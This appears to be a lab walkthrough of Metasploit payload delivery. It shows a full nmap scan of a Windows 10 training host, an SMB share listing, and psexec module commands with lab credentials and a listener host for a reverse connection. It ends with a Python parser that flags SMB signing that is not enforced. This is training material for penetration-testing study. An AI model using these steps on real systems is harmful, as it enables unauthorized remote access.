Automating Payloads & Delivery with Metasploit

April 27, 2024

# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35
Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
Scanned at 2024-04-27 23:41:51 PST for 400s
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE     REASON  VERSION
7/tcp    open  echo        syn-ack
9/tcp    open  discard?    syn-ack
13/tcp   open  daytime     syn-ack Microsoft Windows USA daytime
17/tcp   open  qotd        syn-ack Windows qotd (English)
19/tcp   open  chargen     syn-ack
80/tcp   open  http        syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc       syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open  vmrdp?      syn-ack
Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 57959/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 50733/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 25647/udp): CLEAN (Failed to receive data)
|   Check 4 (port 20860/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-27T15:48:07
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Shells-Win10
|   NetBIOS computer name: SHELLS-WIN10\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-27T08:48:08-07:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds
smbclient -L 10.129.68.35 -U htb-student
search smb
use 63
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71

msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$

msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt!

msf6 exploit(windows/smb/psexec) > set SMBUser htb-student

msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.197
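The psexec module above delivers its payload over SMB on 445/tcp, and the scan itself already flags the relevant weakness (SMB1 signing disabled, SMB2 signing "enabled but not required"). The following Python script is an added example, not part of the original walkthrough: it parses nmap -vv -oN normal output in the shape shown above to pull the open ports and the smb-security-mode / smb2-security-mode signing findings, so the precondition for this delivery path (and the mitigation, enforcing signing) is not missed; the embedded report excerpt is constructed sample data.

```python
import re

# Constructed excerpt shaped like the nmap -vv -oN report above (sample data, not the full scan).
SAMPLE_NMAP = """\
PORT     STATE SERVICE     REASON  VERSION
80/tcp   open  http        syn-ack Microsoft IIS httpd 10.0
445/tcp  open  microsoft-ds syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open  vmrdp?      syn-ack

Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_    Message signing enabled but not required
"""

# port/proto  state  service  reason  [version]  (REASON column is present because of -vv)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_open_ports(report):
    """Return [(port, proto, service, version)] for every open port line."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(4).rstrip("?"),
                          (m.group(6) or "").strip()))
    return ports

def smb_signing(report):
    """Return (smb1_signing, smb2_required) from the smb*-security-mode script output."""
    smb1, smb2_required = None, None
    for line in report.splitlines():
        body = line.lstrip("|_ ").lower()  # drop the nmap script-output prefix
        m = re.match(r"message_signing:\s*(\S+)", body)
        if m:
            smb1 = m.group(1)
        elif body.startswith("message signing"):
            smb2_required = "required" in body and "not required" not in body
    return smb1, smb2_required

def findings(report):
    """Flag SMB reachable on 445/tcp without enforced signing (mitigation: require it)."""
    ports = parse_open_ports(report)
    if not any(p[0] == 445 and p[1] == "tcp" for p in ports):
        return []
    smb1, smb2_required = smb_signing(report)
    if smb1 == "disabled" or smb2_required is False:
        return ["smb_signing_not_enforced"]
    return []
```

Point it at the real `-oN` file from the scan (`open("nmap").read()`) to get the same summary for the host above.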
